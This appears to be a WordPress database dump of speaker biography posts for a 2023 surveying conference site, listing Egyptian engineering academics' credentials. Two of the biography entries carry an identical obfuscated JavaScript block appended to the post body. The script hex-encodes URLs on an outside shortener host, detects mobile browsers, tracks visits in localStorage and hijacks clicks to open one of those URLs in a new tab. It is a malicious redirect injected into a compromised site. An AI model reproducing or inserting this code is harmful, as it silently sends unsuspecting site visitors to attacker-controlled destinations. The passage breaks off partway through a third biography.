(3597,1,'2023-01-14 21:18:35','2023-01-14 21:18:35','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"center\",\"placeholder\":\"Write title…\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>A.elsharkawy@eng.psu.edu.eg</strong><br> <br>  <br>Assistant Professor, Civil Engineering Department, Faculty of Engineering, Port Said University, Port Said, Egypt.<br>Head of infrastructure department, Deputy General Manager in GeoSurv Civil Engineering Consulting Group.<br>Civil Engineering Program Coordinator, Faculty of Engineering, Horus University<br>lecturer at Arab Academy for Science and Technology and Maritime Transport (port said branch), Member of the Board of Directors of the Syndicate of Engineers, Port Said.<br>Researcher in the project end-to-end system for Multi-Sensor Pavement Distress Detection Submitted to Science and Technology Development Fund, Grants for Artificial Intelligence.<br> </td></tr></tbody></table></figure>\n<!-- /wp:table --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Assistant Prof. Ahmed Elsharkawy','','publish','closed','closed','','assistant-prof-ahmed-elsharkawy','','','2023-01-14 21:18:37','2023-01-14 21:18:37','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3597',0,'dt_team','',0),
(3598,1,'2023-01-14 21:18:10','2023-01-14 21:18:10','','loc11','','inherit','open','closed','','loc11','','','2023-01-14 21:18:10','2023-01-14 21:18:10','',3597,'https://gsw2023.com/wp-content/uploads/2023/01/loc11.jpg',0,'attachment','image/jpeg',0),
(3599,1,'2023-01-14 21:21:54','2023-01-14 21:21:54','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"center\",\"placeholder\":\"Write title…\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td>·         Name: Dr. –Ing. Ashraf Talaat M. Abdalllah<br>·         Email: <a href=\"mailto:ashraf.abdallah@aswu.edu.eg\">ashraf.abdallah@aswu.edu.eg</a><br>·         Assistant Professor- Faculty of Engineering-Aswan University.<br>·         [1998-2003]: Bachelor Civil Engineering, 2003, Aswan University, Very Good with Honor.<br>·         [2006-2009]: Master of science Degree, Civil Engineering (Geodesy and Surveying), 2009, Aswan University, Very Good with a title of \' <strong>Accuracy Assessment Study of Using GPS for Surveying Applications in South Egypt</strong>\',<br>·         [2012:2013]: Master thesis Geodesy and Surveying (GPS technology), 2013, Stuttgart University, Germany, with a title of <strong>\'Accuracy Assessment Study of Precise Point Positioning for Static and Kinematic Surveying</strong> \'<br>·         [2011-2016] PhD in Geodesy and Surveying Awarding from Institute of Engineering Geodesy, Stuttgart University, Germany, with a title of <strong>\'Precise Point Positioning for Kinematic Application to Improve Hydrographic Survey</strong> \'.<br>·         Assistant professor in Faculty of Engineering, Civil department, Aswan University, Egypt.<br>·         Post-doc researcher from 8/2021 until now. Institute of Engineering Geodesy, Stuttgart University, Germany.<br>·         Lecturer visitor in the Arab Academy for Science, Techno-logy and Maritime Transport, South Valley branch [2016-2022]<br>·         [2017-2022]: Research Ambassador of the DAAD (German Academic Exchange Service) since 2017.<br>·         Member of the Engineering consulting group, Faculty of Engineering, Aswan University.<br>·         Member of the Egyptian Engineering Syndicate.<br>·         Certified Engineering consultant No. 0106786 for Surveying and GPS applications from the Egyptian Syndicate for Engineering.</td></tr></tbody></table></figure>\n<!-- /wp:table --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr. Eng. Ashraf Talaat M. Abdalllah','','publish','closed','closed','','dr-eng-ashraf-talaat-m-abdalllah','','','2023-01-14 21:21:57','2023-01-14 21:21:57','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3599',0,'dt_team','',0),
(3600,1,'2023-01-14 21:21:32','2023-01-14 21:21:32','','lec12','','inherit','open','closed','','lec12','','','2023-01-14 21:21:32','2023-01-14 21:21:32','',3599,'https://gsw2023.com/wp-content/uploads/2023/01/lec12.jpg',0,'attachment','image/jpeg',0),
(3601,1,'2023-01-14 21:23:17','2023-01-14 21:23:17','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"center\",\"placeholder\":\"Write title…\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td>Prof. Nagwa El-Ashmawy, Professor of Survey Engineering (Remote Sensing Specialist), National Water Research Center, Ministry of Water Resources and Irrigation.<br>El-Ashmawy graduated in Faculty of Engineering- Cairo University in 1993, Civil Engineering. Since then, she has worked as a Civil Engineer in the Survey Research Institute-National Water Research Center. Nagwa got her M.Sc. in Digital Photogrammetry and Remote Sensing in 1998 from Faculty of Engineering, Cairo University. She became an assistant researcher in 2000, and in 2003, she got another M.Sc. in Geoinformatics from ITC, The Netherlands. In 2005, she got a Ph.D. in Digital Photogrammetry and Remote Sensing from Faculty of Engineering, Cairo University.<br>From 2006 to 2010, Dr. El-Ashmawy worked as senior facilitator for regional training in the Regional Center of Training and Water Studies, the Ministry of Water Resources and Irrigation. She, also, was responsible for setting the curriculum of the GIS and Remote Sensing Training Courses and shared as trainer in some of these courses. Additionally, she was the Egyptian director of the German project, “Management Training in Water Sector in Egypt”, and obtained a diploma in Executive Management from the AUC in 2010.<br>She worked in a second Ph.D. in Remote Sensing in Ryerson University (Toronto Metropolitan University, Now), Toronto, Canada, and got the degree in 2015. Dr. El-Ashmawy was promoted as associate Professor in Survey Engineering in the National Water Research Center, in 2014, and got the professor degree in the same specialization in 2022.<br>El-Ashmawy worked in more than 30 projects in civil engineering and surveying including national projects such as the establishment of the National Gravity Network in Egypt, and Developing the New Valley 